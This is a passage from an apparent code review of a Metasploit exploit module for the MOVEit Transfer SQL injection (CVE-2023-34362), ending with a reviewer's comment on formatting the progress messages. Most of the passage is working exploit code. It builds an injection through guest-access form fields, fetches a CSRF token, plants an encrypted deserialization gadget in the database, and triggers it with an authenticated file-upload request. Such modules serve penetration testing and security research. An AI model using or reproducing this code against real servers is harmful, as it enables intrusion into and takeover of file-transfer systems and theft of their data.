modules/exploits/windows/http/moveit_cve_2023_34362.rb

```diff
@@ -0,0 +1,491 @@
+      'MyPkgID' => '0', # Is self provisioned? (must be 0)
+      'MyGuestEmailAddr' => @guest_email_addr, # Must be a valid email address @ MOVEit.DMZ.ClassLib.dll/MOVEit.DMZ.ClassLib/MsgEngine.cs
+      'MyPkgInstID' => '1234', # this can be any int value
+      'MyPkgSelfProvisionedRecips' => sql_payload,
+      'MyUsername' => 'Guest'
+    })
+
+    # Get a CSRF token - this has to be *after* you set MyUsername, since the
+    # username is incorporated into it
+    #
+    # Transaction => request type, different types will work
+    # Arg06 => the package access code (must match what's set above)
+    # Arg12 => promptaccesscode requests a form, which contains a CSRF code
+
+    body = { 'Transaction' => 'dummy', 'Arg06' => 'accesscode', 'Arg12' => 'promptaccesscode' }
+    csrf = get_csrf_token(guestaccess_request(cookies, body))
+
+    # This does the actual injection
+    body = {
+      'Arg06' => 'accesscode',
+      'transaction' => 'secmsgpost',
+      'Arg01' => 'subject',
+      'Arg04' => 'body',
+      'Arg05' => 'sendauto',
+      'Arg09' => 'pkgtest9',
+      'csrftoken' => csrf
+    }
+    guestaccess_request(cookies, body)
+  end
+
+  def sqli_payload(sql_payload)
+    # Create the initial injection, and create the session object
+    payload = [
+      # The initial injection
+      "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.com')",
+    ].concat(sql_payload)
+
+    # Join our payload, and terminate with a comment character
+    return payload.join(';') + ';#'
+  end
+
+  def trigger_deserialization(token_json, files_json, folders_json)
+    files_response = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable&fileId=#{files_json['fileId']}"),
+      'connection' => 'close',
+      'accept' => '*/*',
+      'verify' => false,
+      'headers' => {
+        'Authorization' => "Bearer #{token_json['access_token']}",
+        'Content-Type' => 'application/octet-stream',
+        'Content-Range' => "bytes 0-#{@uploadfile_size - 1}/#{@uploadfile_size}",
+        'X-File-Hash' => Digest::SHA1.hexdigest(@uploadfile_data)
+      },
+      'data' => @uploadfile_data[0, @uploadfile_data.length]
+    })
+
+    # 500 if payload runs :)
+    if files_response.code != 500
+      fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #2 code=#{files_response.code} (#{files_response.body})")
+    end
+  end
+
+  def upload_encrypted_gadget(encrypted_gadget, files_json)
+    haxupload_payload = [
+      "UPDATE moveittransfer.fileuploadinfo SET State='#{encrypted_gadget}' WHERE FileID='#{files_json['fileId']}'",
+    ]
+    vprint_status('Planting encrypted gadget into the DB...')
+    sqli(@cookies, sqli_payload(haxupload_payload))
+  end
+
+  def exploit
+    # Get the sessionID and siLockLongTermInstID
+    print_status('[0/10] Get the sessionID and siLockLongTermInstID')
```

Comment:
Since you get up to 10, these would all be cleaner if they were aligned. Also to be aligned with other progress trackers in MSF, I think the convention is to start at 1 and not 0.

```suggestion
    print_status('[ 1/10] Get the sessionID and siLockLongTermInstID')
```

The same should be applied to the remaining status messages.